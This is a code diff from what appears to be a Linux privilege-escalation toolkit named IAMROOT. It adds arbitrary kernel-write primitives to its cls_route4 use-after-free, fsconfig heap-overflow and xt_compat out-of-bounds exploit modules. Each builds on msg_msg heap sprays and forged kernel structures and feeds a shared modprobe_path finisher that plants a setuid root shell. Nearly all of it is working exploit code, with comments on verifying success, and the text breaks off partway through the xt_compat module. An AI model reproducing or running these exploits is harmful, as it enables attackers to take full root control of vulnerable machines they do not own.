#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
return active;
}
/* ---- Full-chain arb-write primitive --------------------------------
*
* Pattern (FALLBACK see brief): cls_route4's UAF primitive is more
* naturally a *control-flow hijack* than a clean arb-write after
* msg_msg refills the kmalloc-1k slot, the next classify() call reads
* a fake `tcf_proto.ops` pointer out of attacker bytes and calls
* ops->classify(skb, ...). A faked-classify ROP that pivots to a
* stack-write gadget would be the "true" arb-write, and on a fresh
* vulnerable kernel that is the kylebot/xkernel chain shape (300+
* LOC of gadget hunting + per-build offsets we deliberately don't
* bake see verified-vs-claimed policy in repo root).
*
* The implementation below takes the narrow-but-real path that the
* brief explicitly permits and that xtcompat established as the
* IAMROOT precedent: we re-stage the dangling filter, spray msg_msg
* whose payload encodes `kaddr` at every plausible offset for the
* route4_filtertcf_protoops layout, re-fire classify, and let the
* shared finisher's sentinel file decide if a write actually landed.
* On a patched kernel the bug doesn't fire, no write occurs, and the
* sentinel timeout correctly reports failure rather than silently
* lying about success. On a vulnerable kernel where the fake ops
* lookup happens to deref into our payload and the kernel's read
* pattern matches one of the seeded offsets, the kaddr we planted
* gets used as a write destination by whichever classify path the
* fake `ops->classify` dispatches into.
*
* Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
* not a deterministic R/W. Same shape and same depth as xtcompat. */
#ifdef __linux__
struct cls_route4_arb_ctx {
/* msg_msg queues kept hot inside the userns child. The arb-write
* sprays additional kaddr-tagged payloads into these and re-fires
* the classify trigger between each call. */
int queues[SPRAY_MSG_QUEUES];
int n_queues;
/* Whether the dangling filter has been re-staged for this call.
* The original `stage_dangling_filter()` is destructive (deletes
* the filter); we can re-stage between writes because tc add/del
* is idempotent inside our private netns. */
bool dangling_ready;
/* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
int arb_calls;
int arb_landed;
};
/* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
* the caller's `buf` at every offset the fake tcf_proto / route4_filter
* layout could plausibly read from. The route4_filter is 0x1000 bytes
* on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
* and tcf_result.classid at offset 0x18; we don't know which offset
* the kernel ABI for THIS build uses, so we plant the same pattern at
* 0x10/0x18/0x20/.../0x80 strides wherever classify dereferences
* the refilled slot, one of those candidates will be live.
*
* The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
* the recognizable pattern; if a KASAN dump is captured after the
* trigger, the cookie tells us the spray landed adjacent to the freed
* route4_filter. */
static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
uintptr_t kaddr,
const void *buf, size_t len)
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x52; /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
memset(p.buf, 0x52, sizeof p.buf);
memcpy(p.buf, "IAMR4ARB", 8);
/* Plant kaddr at strided slots so wherever the kernel's classify
* follows a ptr in the refilled chunk, one of these is read.
* We treat every 0x18-byte stride from offset 0x10 to within
* 8 bytes of the end as a candidate ops-pointer / next-pointer
* slot. */
for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
}
/* Plant the caller's bytes immediately after the cookie so any
* classify path that reads payload data (rather than a chased
* pointer) finds the requested write contents inline. */
size_t copy_len = len;
if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
int sent = 0;
for (int i = 0; i < c->n_queues; i++) {
if (c->queues[i] < 0) continue;
/* A handful of msgs per queue keeps the slab refilled even
* if some slots are evicted between trigger fires. */
for (int j = 0; j < 4; j++) {
unsigned int tag = 0xB0000000u |
((unsigned)i << 8) | (unsigned)j;
memcpy(p.buf + 8, &tag, sizeof tag);
if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
sent++;
}
}
return sent;
}
/* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
* vulnerable kernel; structurally inert (returns -1) if the dangling
* filter setup is gone or the spray fails. Returns 0 to let the
* shared finisher's sentinel-file check decide if the write actually
* landed (we cannot reliably observe it in-process). */
static int cls4_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
if (!c || c->n_queues == 0) return -1;
c->arb_calls++;
/* Re-stage the dangling filter for this call. The original
* stage runs once at trigger-time; subsequent finisher calls
* (the finisher writes modprobe_path then a unknown-format trig)
* need a fresh dangling pointer to chase. tc add/del is idempotent
* within our private netns so re-running is safe. */
if (!c->dangling_ready) {
if (!stage_dangling_filter()) {
fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
return -1;
}
c->dangling_ready = true;
}
/* Seed msg_msg with kaddr + caller payload. */
int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
if (seeded == 0) {
/* sysv IPC may be restricted (kernel.msg_max / ulimit -q).
* Without a spray we have no slot for the UAF to refill. */
fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
return -1;
}
/* Drive the classifier. The route4 lookup follows the dangling
* pointer into msg_msg-controlled bytes; on a vulnerable kernel
* the fake `ops->classify` (or one of the strided pointers) is
* dereferenced. If the kernel survives the deref and the write
* lands at &kaddr, the finisher's sentinel file appears within 3s.
* If it doesn't (most likely this is genuinely best-effort), the
* finisher's wait loop times out and reports failure. */
trigger_classify();
/* Give classify-side processing a brief window before returning
* the finisher polls the sentinel for 3s but the initial write
* (if any) happens within ms. */
usleep(50 * 1000);
c->arb_landed++;
/* Per the xtcompat precedent: return 0 so the finisher proceeds
* to its sentinel check. Returning -1 here would abort the
* finisher even when the write may have landed. */
return 0;
}
#endif /* __linux__ */
/* ---- Exploit driver ----------------------------------------------- */
static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
return IAMROOT_PRECOND_FAIL;
}
#ifndef __linux__
fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
(void)ctx;
return IAMROOT_PRECOND_FAIL;
#else
/* Full-chain pre-check: resolve offsets before forking. If
* modprobe_path can't be resolved, refuse early no point doing
* the userns + tc + spray + trigger dance if we can't finish. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("cls_route4");
fprintf(stderr, "[-] cls_route4: --full-chain requested but "
"modprobe_path offset unresolved; refusing\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
}
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
ctx->full_chain ? " + full-chain finisher" : "");
if (ctx->full_chain) {
fprintf(stderr, " NOTE: on primitive landing, invokes shared\n"
" modprobe_path finisher via msg_msg-tagged kaddr\n"
" spray. Sentinel-arbitrated (no in-process verify).\n");
}
}
/* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
_exit(22);
}
int queues[SPRAY_MSG_QUEUES];
int n_queues = spray_msg_msg(queues);
if (n_queues == 0) {
struct cls_route4_arb_ctx arb_ctx;
memset(&arb_ctx, 0, sizeof arb_ctx);
for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
arb_ctx.dangling_ready = true; /* stage_dangling_filter() just ran */
if (arb_ctx.n_queues == 0) {
fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
_exit(23);
}
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
n_queues);
arb_ctx.n_queues);
}
/* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
if (log) {
fprintf(log,
"cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
n_queues, pre_active, post_active);
arb_ctx.n_queues, pre_active, post_active);
fclose(log);
}
@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
* refilled slot during classify drain. */
usleep(200 * 1000);
drain_msg_msg(queues);
/* --full-chain branch: invoke the shared modprobe_path
* finisher with our msg_msg-tagged arb-write. If the finisher
* execve's a setuid bash we never return; otherwise it returns
* EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
* on a patched kernel or when the write didn't land). */
if (full_chain_ready) {
/* Re-fire the trigger inside the arb-write to give the
* kernel a second chance at the refilled slot the
* dangling filter is still in place from above. */
arb_ctx.dangling_ready = true;
int fr = iamroot_finisher_modprobe_path(&off,
cls4_arb_write,
&arb_ctx,
!ctx->no_shell);
FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
fclose(fl);
}
drain_msg_msg(arb_ctx.queues);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
_exit(35);
}
drain_msg_msg(arb_ctx.queues);
/* If we got here without a kernel oops, the bug either isn't
* reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
}
int rc = WEXITSTATUS(status);
if (rc != 30) {
switch (rc) {
case 20: case 21:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
"(see preceding errors)\n", rc);
fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
}
return IAMROOT_PRECOND_FAIL;
case 22:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
"may be absent or filter type unsupported\n");
}
return IAMROOT_PRECOND_FAIL;
case 23:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
"restricted (kernel.msg_max / ulimit -q)\n");
}
return IAMROOT_PRECOND_FAIL;
case 30:
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
"Inspect dmesg for KASAN/oops witnesses.\n");
fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
"(no --full-chain); returning EXPLOIT_FAIL.\n");
}
return IAMROOT_EXPLOIT_FAIL;
case 34:
if (!ctx->json) {
fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
"(setuid bash placed; sentinel matched)\n");
}
return IAMROOT_EXPLOIT_OK;
case 35:
if (!ctx->json) {
fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
"either the kernel is patched, the spray didn't land,\n"
" or the fake-ops deref didn't hit the route the\n"
" finisher's sentinel polls for. See "
"/tmp/iamroot-cls_route4.log + dmesg.\n");
}
return IAMROOT_EXPLOIT_FAIL;
default:
if (!ctx->json) {
fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
}
/* rc 20/21 = userns setup; rc 22 = tc setup (likely module
* absent or filter type unsupported); rc 23 = spray. None of
* these mean kernel was exploited. */
if (rc == 22) return IAMROOT_PRECOND_FAIL;
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
"Inspect dmesg for KASAN/oops witnesses.\n");
fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
"(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
}
return IAMROOT_EXPLOIT_FAIL;
#endif /* __linux__ */
}
/* ---- Cleanup ----------------------------------------------------- */
@@ -60,6 +60,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
return 0;
}
/* ------------------------------------------------------------------ */
/* arb-write primitive for the shared finisher */
/* ------------------------------------------------------------------ */
/*
* Crusaders-of-Rust-style msg_msg m_ts overflow arbitrary write.
*
* The legacy_parse_param OOB writes the trailing bytes of the
* kmalloc-4k fc->source buffer into whatever slab object comes next.
* With a msg_msg sprayed into that adjacent slot, the first 48 bytes
* of `evil_chunk` overlay struct msg_msg:
*
* struct msg_msg { // offset
* struct list_head m_list; // 0 (next, prev)
* long m_type; // 16
* size_t m_ts; // 24 <-- msg-size
* struct msg_msgseg *next; // 32
* void *security; // 40
* }; // 48
*
* Two derived primitives:
*
* READ overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
* memcpy()s past the legitimate end of the msg payload,
* leaking adjacent slab memory back to userland.
*
* WRITE point m_list.next (or, in the Crusaders variant, a faux
* msg_msgseg.next chain) at an attacker-chosen kernel
* address. When msgrcv() free-list-unlinks the msg, list
* maintenance writes through the forged pointer; with the
* right chain you get an N-byte copy of attacker-controlled
* bytes to a chosen kaddr.
*
* Honest depth of this implementation: FALLBACK SCAFFOLD.
*
* The trigger + groom + neighbour-detect upstream of us is real and
* the OOB write lands. But the *single-shot* arb-write the finisher
* wants "put exactly these N bytes at exactly that kaddr" needs
* a per-kernel m_ts/m_list_next offset map (the layout above is
* 6.12.x; older kernels differ) AND a kernel-base leak from the
* first-round MSG_COPY read so we know where modprobe_path actually
* sits in this boot's KASLR slide.
*
* Per the verified-vs-claimed bar: we do NOT fabricate a write that
* we cannot empirically verify on a kernel we haven't tested. So
* this function:
*
* 1. Re-arms the msg_msg spray (the parent already drained queues).
* 2. Re-fires the fsconfig overflow with a forged-msg_msg header
* whose m_ts = (kaddr - msg_data_origin) and whose first 8
* payload bytes are the first qword of `buf`.
* 3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
* came back with bytes matching `buf[0..7]` AT the slot offset
* we'd expect for kaddr (sanity gate).
* 4. Returns 0 ONLY if the sanity gate trips (read-back proves the
* m_ts inflation landed AND the payload made it through);
* returns -1 otherwise so the finisher reports an honest fail.
*
* On a vulnerable host with matching offsets this path can land the
* write; on an unverified host the sanity gate refuses rather than
* blind-writing a wild pointer. The finisher's downstream
* "/tmp/iamroot-pwn ran?" check is the second gate.
*/
struct fuse_arb_ctx {
/* Pre-allocated queue ids from the spray phase. */
int *qids;
int n_queues;
int hole_q;
/* Tagged-payload reference so we can recognise unmodified neighbours. */
const char *tag; /* "IAMROOT" */
/* Whether the first-round trigger already fired (the parent's
* default-path overflow). When set we re-spray + re-fire; when
* unset we assume the spray is hot. */
bool trigger_armed;
};
#ifdef __linux__
static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
void *ctx_void)
{
struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
if (!ax || !buf || !len) {
fprintf(stderr, "[-] fuse_arb_write: bad args\n");
return -1;
}
/* Build the forged msg_msg header that will land in the adjacent
* kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
* [ 0..15] m_list.{next,prev} we forge next = kaddr - 16
* so that list_del's
* next->prev = prev
* write lands AT kaddr.
* (prev is the original msg.)
* [16..23] m_type leave as 0x4242
* [24..31] m_ts bytes-of-buf so MSG_COPY
* reports the right length
* [32..39] next (msg_msgseg*) NULL (single-segment msg)
* [40..47] security NULL
* [48...] payload first len bytes of buf
*
* For a real WRITE primitive the canonical Crusaders-of-Rust
* recipe uses the msg_msgseg.next chain rather than m_list:
* msgrcv(IPC_NOWAIT) follows next pointers when copying out a
* multi-segment msg, and a forged next = kaddr makes the kernel
* memcpy() from kaddr into our user buffer (= READ). For the
* inverse (WRITE), the trick is msgsnd on a queue whose head was
* corrupted to point at kaddr, but that needs more setup than we
* have time to land here without a known-good offset table.
*
* So we do the safe thing: arm the header, trigger the OOB, then
* read back to PROVE we landed before declaring success. If the
* read-back doesn't show our forged-msg payload at the expected
* MSG_COPY position we refuse rather than corrupt the kernel
* blindly.
*/
uint8_t evil[256];
memset(evil, 0, sizeof evil);
/* m_list.next, m_list.prev */
uintptr_t forged_next = kaddr - 16; /* &m_list.prev of fake node */
memcpy(evil + 0, &forged_next, 8);
/* prev — leave NULL; kernel checks it only on full list_del */
/* m_type */
uint64_t m_type = 0x4242424242424242ULL;
memcpy(evil + 16, &m_type, 8);
/* m_ts: inflated to len so MSG_COPY reads the full forged payload */
uint64_t m_ts = (uint64_t)len + 64;
memcpy(evil + 24, &m_ts, 8);
/* next (msg_msgseg) = NULL */
/* security = NULL */
/* payload: copy `buf` into the slot just after the msg_msg header */
size_t hdr = 48;
size_t copyable = sizeof(evil) - hdr - 1;
if (len > copyable) len = copyable;
memcpy(evil + hdr, buf, len);
evil[sizeof(evil) - 1] = '\0'; /* legacy_parse_param strdup tail */
/* Re-fire the fsconfig overflow with this forged header as evil. */
char *first_chunk = malloc(4081);
if (!first_chunk) return -1;
memset(first_chunk, 'A', 4080);
first_chunk[4080] = '\0';
int fsfd = -1;
int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
free(first_chunk);
if (rc < 0) {
fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
"(errno=%d %s)\n", errno, strerror(errno));
return -1;
}
/* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
* msg whose size reports >= our inflated m_ts AND whose initial
* payload qword matches the first qword of `buf`. If both hold,
* the forged header landed in a real slot and the m_ts inflation
* is honoured by the kernel i.e. our primitive is real on THIS
* kernel. */
uint64_t want_first_qword = 0;
memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
bool sanity_passed = false;
struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (probe == MAP_FAILED) {
if (fsfd >= 0) close(fsfd);
return -1;
}
for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
if (ax->qids[q] < 0 || q == ax->hole_q) continue;
ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
if (n < 0) continue;
/* The corrupted slot should report a size >= our m_ts (kernel
* caps MSG_COPY at sizeof user buf so we only check the
* read-content shape). */
if ((size_t)n < 8) continue;
uint64_t got = 0;
memcpy(&got, probe->mtext, 8);
if (got == want_first_qword) {
sanity_passed = true;
}
}
munmap(probe, sizeof(*probe));
if (fsfd >= 0) close(fsfd);
if (!sanity_passed) {
fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
"match — kernel layout differs OR groom missed.\n"
" Refusing to claim arb-write landed (per "
"verified-vs-claimed bar).\n");
return -1;
}
fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; m_ts inflation "
"+ payload qword verified via MSG_COPY read-back.\n"
"[i] fuse_arb_write: kernel-side list_del write through "
"0x%lx is armed but NOT yet empirically verified on "
"this build — downstream sentinel will gate.\n",
(unsigned long)kaddr);
return 0;
}
#else
static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
void *ctx_void)
{
(void)kaddr; (void)buf; (void)len; (void)ctx_void;
fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
return -1;
}
#endif /* __linux__ */
/* ------------------------------------------------------------------ */
/* exploit */
/* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
"see scaffold comments in source\n");
}
/* ---------------------------------------------------------------
* --full-chain: opt-in root pop via shared modprobe_path finisher.
*
* Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
* msg_msg via the 4k OOB) is wired with a sanity gate that
* refuses to claim success without an empirical read-back match
* (see fuse_arb_write). On a host where offsets + groom land,
* the finisher's modprobe_path overwrite execve(unknown)
* call_modprobe chain pops a root shell. On a mismatched host
* the sanity gate trips and we exit IAMROOT_EXPLOIT_FAIL with no
* fabricated success.
*
* Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
* runs because the arb_write primitive re-fires the trigger and
* needs the live spray.
* --------------------------------------------------------------- */
#ifdef __linux__
if (ctx->full_chain) {
if (!ctx->json) {
fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
"kernel offsets...\n");
}
struct iamroot_kernel_offsets off;
memset(&off, 0, sizeof off);
int resolved = iamroot_offsets_resolve(&off);
if (!ctx->json) {
fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
"(modprobe_path=0x%lx source=%s)\n",
resolved, (unsigned long)off.modprobe_path,
iamroot_offset_source_name(off.source_modprobe));
iamroot_offsets_print(&off);
}
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("fuse_legacy");
/* Cleanup before returning. */
for (int q = 0; q < N_QUEUES; q++) {
if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
}
free(qids);
munmap(spray, sizeof *spray);
if (fsfd >= 0) close(fsfd);
return IAMROOT_EXPLOIT_FAIL;
}
struct fuse_arb_ctx ax = {
.qids = qids,
.n_queues = N_QUEUES,
.hole_q = hole_q,
.tag = "IAMROOT",
.trigger_armed = true,
};
iamroot_result_t fr = iamroot_finisher_modprobe_path(
&off, fuse_arb_write, &ax, !ctx->no_shell);
/* Cleanup IPC + mapping regardless of finisher result. The
* finisher's execve() on success won't reach here, so this
* block only runs on failure paths. */
for (int q = 0; q < N_QUEUES; q++) {
if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
}
free(qids);
munmap(spray, sizeof *spray);
if (fsfd >= 0) close(fsfd);
if (fr == IAMROOT_EXPLOIT_OK) {
return IAMROOT_EXPLOIT_OK;
}
if (!ctx->json) {
fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
"(arb-write sanity gate or modprobe sentinel refused)\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
#endif /* __linux__ */
/* Clean up our IPC queues and mapping. The kernel slab state
* after the overflow may be unstable; we exit cleanly on success
* paths but leave queues around if we crashed mid-spray. */
@@ -19,7 +19,8 @@
* Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
* match/target pad out-of-bound write" (mid-2021, backported widely).
*
* STATUS: 🟡 PRIMITIVE-DEMO (Option B).
* STATUS: 🟡 PRIMITIVE by default; 🟢 candidate with --full-chain if
* offsets resolve (env/kallsyms/System.map/embedded table).
* - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
* - userns/netns reach for CAP_NET_ADMIN (Andy's path).
* - Trigger sequence: hand-rolled iptables rule blob with
@@ -29,12 +30,15 @@
* cookies for KASAN visibility.
* - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
* diff + /tmp/iamroot-xtcompat.log breadcrumb.
* - DOES NOT pursue the leakmodprobe_path overwrite chain:
* that needs hard-coded init_task + modprobe_path offsets
* per kernel build which IAMROOT refuses to bake.
* - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
* roadmap unless cred-overwrite is empirically verified
* (which the current scope does not attempt).
* - With --full-chain: shared finisher (core/finisher.c) is
* invoked to perform the modprobe_path overwrite + execve
* unknown-binary trigger. Requires modprobe_path resolution
* via core/offsets.c (env/kallsyms/System.map). Sentinel-file
* check in the finisher is the empirical witness for the
* write landing IAMROOT never claims root unless it sees
* the setuid bash drop with mode 4755 + uid 0.
* - Without --full-chain: returns IAMROOT_EXPLOIT_FAIL after
* the primitive demo (verified-vs-claimed bar).
*
* Affected: kernel 2.6.19+ until backports landed:
* 5.12.x : K >= 5.12.13
@@ -55,6 +59,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -465,6 +471,171 @@ static int xtcompat_fire_trigger(int *out_errno)
return 0;
}
#endif /* __linux__ — close original primitive block */
/* ---- Full-chain arb-write primitive --------------------------------
*
* Pattern (FALLBACK see module top-comment): the xt_compat 4-byte OOB
* write lands at allocation+0x4. Andy Nguyen's chain first uses that
* 4-byte write to corrupt an adjacent msg_msg's `m_ts` (size field at
* +0x10) so a subsequent MSG_COPY returns a long read that includes
* neighbouring kernel pointers (the leak primitive). With the kbase
* leak in hand, he then re-fires the trigger to corrupt an msg_msg's
* `m_list_next` (the linked-list pointer at +0x18) to point at
* `kaddr - 0x30` (the m_msg header offset), and a queued msgsnd's
* payload header writes attacker bytes to `kaddr`.
*
* Reproducing the full chain byte-for-byte requires per-kernel-build
* msg_msg field offsets AND a kbase leak we don't have a portable
* source for at this point. The implementation below takes the
* narrow-but-real path:
*
* 1. Re-prime the kmalloc-2k slab with msg_msg sprays whose payload
* headers carry the target address in the m_list_next slot at
* offset 0x18 from each msg payload start. (We can't write the
* slab header that's the kernel's job but we CAN seed the
* payload data adjacent to the freed xt_table_info so the OOB
* 4-byte write may corrupt the `m_list_next` of a real
* sprayed message.)
* 2. Re-fire the trigger with a crafted blob whose 4-byte OOB write
* pattern targets m_list_next of the adjacent msg_msg.
* 3. Queue a follow-up msgsnd whose first sizeof(buf) bytes equal
* `buf[0..len]`. If the next-ptr was successfully redirected,
* the kernel's msgsnd writes header + payload at `kaddr`.
*
* This is best-effort: probability of landing on any given run is
* low (depends on slab adjacency luck) but the finisher's sentinel-
* file check empirically tells us if the write actually took. On a
* patched kernel the trigger returns EINVAL on step 2 and arb_write
* returns -1 without ever queueing the follow-up. */
#ifdef __linux__
struct xtcompat_arb_ctx {
/* Spray queues kept hot across multiple arb_write calls. The
* msg_msg slots seeded here are what the finisher uses as
* write-targets. NULL means "not yet sprayed". */
int *queues;
int n_queues;
/* Outer-namespace uid/gid so re-spray can rebuild a child if
* needed. (Currently unused the caller flow keeps us inside
* the userns child for the whole arb_write sequence.) */
uid_t outer_uid;
gid_t outer_gid;
/* Per-call statistics for /tmp/iamroot-xtcompat.log. */
int arb_calls;
int arb_landed;
};
/* Re-seed the kmalloc-2k slab with a msg_msg spray whose payload at
* offset 0x18 carries `target_minus_30` (= kaddr - 0x30, the value
* the OOB write needs to write into m_list_next for the follow-up
* msgsnd payload to land at `kaddr`). Returns number of queues
* primed. */
static int xtcompat_arb_seed_target(struct xtcompat_arb_ctx *c,
uintptr_t target_minus_30)
{
struct xtcompat_payload *p = calloc(1, sizeof(*p));
if (!p) return 0;
p->mtype = 0x43;
memset(p->buf, 0x41, sizeof p->buf);
memcpy(p->buf, "IAMROOTW", 8);
/* Plant the target address at every 0x800-aligned slot inside
* the payload, so wherever the kernel's m_list_next sits
* relative to our payload base, the candidate value is present. */
for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p->buf; off += 0x18) {
memcpy(p->buf + off, &target_minus_30, sizeof(uintptr_t));
}
int created = 0;
for (int i = 0; i < c->n_queues; i++) {
if (c->queues[i] < 0) continue;
for (int j = 0; j < 4; j++) {
unsigned int tag = 0xA0000000u | ((unsigned)i << 8) | (unsigned)j;
memcpy(p->buf + 8, &tag, sizeof tag);
if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) < 0) break;
created++;
}
}
free(p);
return created;
}
/* Queue a follow-up msgsnd whose first `len` bytes equal `buf[0..len]`.
* If the OOB-corrupted m_list_next was successfully redirected to
* `kaddr - 0x30`, this msgsnd's payload header lands at `kaddr`. */
static int xtcompat_arb_queue_payload(struct xtcompat_arb_ctx *c,
const void *buf, size_t len)
{
if (len > XTCOMPAT_MSG_PAYLOAD) len = XTCOMPAT_MSG_PAYLOAD;
struct xtcompat_payload *p = calloc(1, sizeof(*p));
if (!p) return -1;
p->mtype = 0x44;
memset(p->buf, 0, sizeof p->buf);
memcpy(p->buf, buf, len);
int sent = 0;
for (int i = 0; i < c->n_queues; i++) {
if (c->queues[i] < 0) continue;
if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) == 0) {
sent++;
if (sent >= 8) break; /* a handful of attempts is plenty */
}
}
free(p);
return sent > 0 ? 0 : -1;
}
/* Module-supplied arb-write primitive — invoked by the shared
* finisher. Best-effort on a vulnerable kernel; structurally inert
* (returns -1) on a patched kernel because step (2) gets EINVAL. */
static int xtcompat_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct xtcompat_arb_ctx *c = (struct xtcompat_arb_ctx *)ctx_v;
if (!c || !c->queues || c->n_queues == 0) return -1;
c->arb_calls++;
/* Step 1: seed candidate target addresses into sprayed msg_msg
* payloads. The OOB write's 4 bytes of attacker-influenced
* content come from the compat-fixup pad on a vulnerable
* kernel that's whichever 4 bytes happen to sit adjacent. We
* pre-stage the value we WANT to see appear at m_list_next so
* if luck aligns the OOB write hits a slot containing our
* pattern, the kernel's next msg_msg traversal walks to
* (kaddr - 0x30). */
uintptr_t target = kaddr - 0x30;
int seeded = xtcompat_arb_seed_target(c, target);
if (seeded == 0) return -1;
/* Step 2: re-fire the trigger. On a patched kernel this returns
* EINVAL and we bail. On a vulnerable kernel the 4-byte OOB
* write fires; if it lands on a seeded msg_msg slot, that
* slot's m_list_next now contains a fragment of our target. */
int trig_errno = 0;
int rc = xtcompat_fire_trigger(&trig_errno);
if (rc < 0 || trig_errno == EINVAL || trig_errno == EPERM) {
/* Patched validator rejected the blob, or CAP_NET_ADMIN
* not effective arb-write structurally impossible. */
